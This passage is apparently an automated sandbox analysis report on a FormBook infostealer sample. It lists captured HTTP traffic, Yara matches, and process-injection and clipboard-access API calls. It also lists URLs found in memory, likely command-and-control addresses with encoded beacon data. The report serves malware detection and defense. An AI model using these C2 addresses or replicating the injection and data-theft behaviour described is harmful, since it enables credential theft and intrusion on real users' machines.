                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:37 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ed07-1a3"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:39 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ecf7-1a3"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:42 GMTContent-Type: text/htmlContent-Length: 419Connection: closeETag: "6642ed07-1a3"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeLink: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=kPF5WOIbv289WV_8Iv3X8SkQUHdrTl1cyi.LnhZ19NE-1736531568-1.0.1.1-wLlpJPI2CpHKNBGn5BQnfRjo_e0COCMx6BtjRy_5UCTxce2zSGIWMDIdXP3vj2Nef.CJBuhWdBE6r3OyGWawFg; path=/; expires=Fri, 10-Jan-25 18:22:48 GMT; domain=.www.santillo.bet; HttpOnlySet-Cookie: _cfuvid=tjDDRZqDWqo8a54c.rcLDL7Wr_6tCMYR8nvg3i_x0.Y-1736531568058-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnlyServer: cloudflareCF-RAY: 8ffe85dadf137c9f-EWRContent-Encoding: gzipData Raw: 37 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55 Data Ascii: 719Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeLink: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=K9cchmZV9L18Uz6a40P9HjSoChJpH5MWTf4TC497znU-1736531570-1.0.1.1-O5SA7sTayuFHs7fbBoOpzkbVABEGnUx8QxtUnL4Hl..FnNys9qNxhNGtYwy2y1ryE4u9XGocNs00nJVxtB2hSg; path=/; expires=Fri, 10-Jan-25 18:22:50 GMT; domain=.www.santillo.bet; HttpOnlySet-Cookie: _cfuvid=C1.elr4RXk_GoQvjY3xrxDTseg2.UvfbIPX.0JDABbc-1736531570654-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnlyServer: cloudflareCF-RAY: 8ffe85eb683f18b8-EWRContent-Encoding: gzipData Raw: 37 32 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55 Data Ascii: 724Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeLink: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=xk_ltVpSlwlZZ42q52B_m0jLl79P5naSHaqtn3N3vZ0-1736531573-1.0.1.1-Ucb5Xtle.3ZPXmsaP5eeiH6A.49KjLMSuYFFFLdGwRSPT85BDN5_UctJvqWS7yQtPY96f2ZXUU41UZd.mxCADg; path=/; expires=Fri, 10-Jan-25 18:22:53 GMT; domain=.www.santillo.bet; HttpOnlySet-Cookie: _cfuvid=Vp8sHZlvK9FHbdMB1Zxd3QFVCFX0UcpB949mCxG3hOQ-1736531573139-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnlyServer: cloudflareCF-RAY: 8ffe85fb1a98efa1-EWRContent-Encoding: gzipData Raw: 37 32 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55 Data Ascii: 724Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 10 Jan 2025 17:53:09 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-10T17:53:14.5483463Z
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000005216000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.00000000037B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://pku-cs-cjw.top/k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000005B82000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000004122000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGD
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.00000000053A8000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003948000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E
                Source: wdFhguqpcrad.exe, 00000007.00000002.3562519026.00000000056D4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shipley.group
                Source: wdFhguqpcrad.exe, 00000007.00000002.3562519026.00000000056D4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shipley.group/5g1j/
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Y
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: wiaacmgr.exe, 00000006.00000003.2135441725.00000000078C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.00000000059F0000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003F90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wanwang.aliyun.com/nametrade/domainshow?domain=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.000000000553A000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3563035654.0000000007590000.00000004.00000800.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003ADA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.00000000056CC000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003C6C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0095EAFF
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0095ED6A
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0095EAFF
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_0094AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0094AA57
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exeCode function: 0_2_00979576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00979576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: 3HnH4uJtE7.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 3HnH4uJtE7.exe, 00000000.00000000.1706967477.00000000009A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e0d5cc60-7
                Source: 3HnH4uJtE7.exe, 00000000.00000000.1706967477.00000000009A2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3ac6b912-9
                Source: 3HnH4uJtE7.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f6ed0791-4
                Source: 3HnH4uJtE7.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fb892a7b-3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CB43 NtClose,1_2_0042CB43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AA5A NtMapViewOfSection,1_2_0040AA5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372B60 NtClose,LdrInitializeThunk,1_2_03372B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03372DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033735C0 NtCreateMutant,LdrInitializeThunk,1_2_033735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03374340 NtSetContextThread,1_2_03374340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03374650 NtSuspendThread,1_2_03374650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BA0 NtEnumerateValueKey,1_2_03372BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372B80 NtQueryInformationFile,1_2_03372B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BF0 NtAllocateVirtualMemory,1_2_03372BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372BE0 NtQueryValueKey,1_2_03372BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AB0 NtWaitForSingleObject,1_2_03372AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AF0 NtWriteFile,1_2_03372AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372AD0 NtReadFile,1_2_03372AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F30 NtCreateSection,1_2_03372F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F60 NtCreateProcessEx,1_2_03372F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FB0 NtResumeThread,1_2_03372FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FA0 NtQuerySection,1_2_03372FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372F90 NtProtectVirtualMemory,1_2_03372F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372FE0 NtCreateFile,1_2_03372FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372E30 NtWriteVirtualMemory,1_2_03372E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372EA0 NtAdjustPrivilegesToken,1_2_03372EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372E80 NtReadVirtualMemory,1_2_03372E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372EE0 NtQueueApcThread,1_2_03372EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D30 NtUnmapViewOfSection,1_2_03372D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D10 NtMapViewOfSection,1_2_03372D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372D00 NtSetInformationFile,1_2_03372D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DB0 NtEnumerateKey,1_2_03372DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372DD0 NtDelayExecution,1_2_03372DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C00 NtQueryInformationProcess,1_2_03372C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C70 NtFreeVirtualMemory,1_2_03372C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372C60 NtCreateKey,1_2_03372C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CA0 NtQueryInformationToken,1_2_03372CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CF0 NtOpenProcess,1_2_03372CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03372CC0 NtQueryVirtualMemory,1_2_03372CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373010 NtOpenDirectoryObject,1_2_03373010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373090 NtSetValueKey,1_2_03373090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033739B0 NtGetContextThread,1_2_033739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D10 NtOpenProcessToken,1_2_03373D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03373D70 NtOpenThread,1_2_03373D70
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E4650 NtSuspendThread,LdrInitializeThunk,6_2_046E4650
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E4340 NtSetContextThread,LdrInitializeThunk,6_2_046E4340
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2C60 NtCreateKey,LdrInitializeThunk,6_2_046E2C60
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_046E2C70
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_046E2CA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_046E2D30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_046E2D10
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_046E2DF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2DD0 NtDelayExecution,LdrInitializeThunk,6_2_046E2DD0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_046E2EE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_046E2E80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2F30 NtCreateSection,LdrInitializeThunk,6_2_046E2F30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2FE0 NtCreateFile,LdrInitializeThunk,6_2_046E2FE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2FB0 NtResumeThread,LdrInitializeThunk,6_2_046E2FB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2AF0 NtWriteFile,LdrInitializeThunk,6_2_046E2AF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 6_2_046E2AD0 NtReadFile,LdrInitializeThunk,6_2_046E2AD0
